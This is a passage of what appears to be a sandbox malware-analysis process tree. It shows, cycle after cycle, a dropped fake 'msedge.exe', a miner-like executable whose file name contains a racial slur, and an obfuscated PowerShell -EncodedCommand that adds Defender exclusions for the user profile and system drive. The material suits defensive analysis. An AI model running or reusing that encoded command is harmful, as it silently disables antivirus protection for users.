        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        51⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2808
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        51⤵
        Executes dropped EXE
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        51⤵
        Loads dropped DLL
        
        PID:3976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        52⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        52⤵
        Executes dropped EXE
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        52⤵
        Loads dropped DLL
        
        PID:4040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        53⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3264
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        53⤵
        Executes dropped EXE
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        53⤵
        Loads dropped DLL
        
        PID:2644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        54⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1220
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        54⤵
        Executes dropped EXE
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        54⤵
        Loads dropped DLL
        
        PID:2800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        55⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1956
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        55⤵
        Executes dropped EXE
        
        PID:3972
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        55⤵
        Loads dropped DLL
        
        PID:3848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        56⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:332
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        56⤵
        Executes dropped EXE
        
        PID:2296
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        56⤵
        Loads dropped DLL
        
        PID:352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        57⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:556
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        57⤵
        Executes dropped EXE
        
        PID:3880
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        57⤵
        Loads dropped DLL
        
        PID:2788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        58⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4036
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        58⤵
        Executes dropped EXE
        
        PID:3884
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        58⤵
        Loads dropped DLL
        
        PID:3848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        59⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:800
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        59⤵
        Executes dropped EXE
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        59⤵
        Loads dropped DLL
        
        PID:2148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        60⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        60⤵
        Executes dropped EXE
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        60⤵
        Loads dropped DLL
        
        PID:568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        61⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:572
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        61⤵
        Executes dropped EXE
        
        PID:916
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        61⤵
        Loads dropped DLL
        
        PID:2600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        62⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        62⤵
        Executes dropped EXE
        
        PID:2276
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        62⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        63⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        63⤵
        Executes dropped EXE
        
        PID:600
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        63⤵
        Loads dropped DLL
        
        PID:584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        64⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1020
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        64⤵
        Executes dropped EXE
        
        PID:3484
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        64⤵
        Loads dropped DLL
        
        PID:3856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        65⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        65⤵
        Executes dropped EXE
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        65⤵
        
        PID:3896
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        66⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:804
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        66⤵
        
        PID:3556
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        66⤵
        
        PID:1340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        67⤵
        System Location Discovery: System Language Discovery
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        67⤵
        
        PID:968
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        67⤵
        System Location Discovery: System Language Discovery
        
        PID:3300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        68⤵
        
        PID:568
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        68⤵
        
        PID:2528
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        68⤵
        System Location Discovery: System Language Discovery
        
        PID:1596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        69⤵
        
        PID:3312
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        69⤵
        
        PID:3156
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        69⤵
        System Location Discovery: System Language Discovery
        
        PID:4008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        70⤵
        System Location Discovery: System Language Discovery
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        70⤵
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        70⤵
        
        PID:3980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        71⤵
        
        PID:2036
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        71⤵
        
        PID:844
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        71⤵
        
        PID:1304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        72⤵
        System Location Discovery: System Language Discovery
        
        PID:1944
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        72⤵
        
        PID:1592
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        72⤵
        System Location Discovery: System Language Discovery
        
        PID:2008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        73⤵
        
        PID:3292
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        73⤵
        
        PID:4044
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        73⤵
        System Location Discovery: System Language Discovery
        
        PID:3052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        74⤵
        
        PID:3204
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        74⤵
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        74⤵
        System Location Discovery: System Language Discovery
        
        PID:3628
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        75⤵
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        75⤵
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        75⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        76⤵
        System Location Discovery: System Language Discovery
        
        PID:3404
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        76⤵
        
        PID:3264
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        76⤵
        System Location Discovery: System Language Discovery
        
        PID:668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
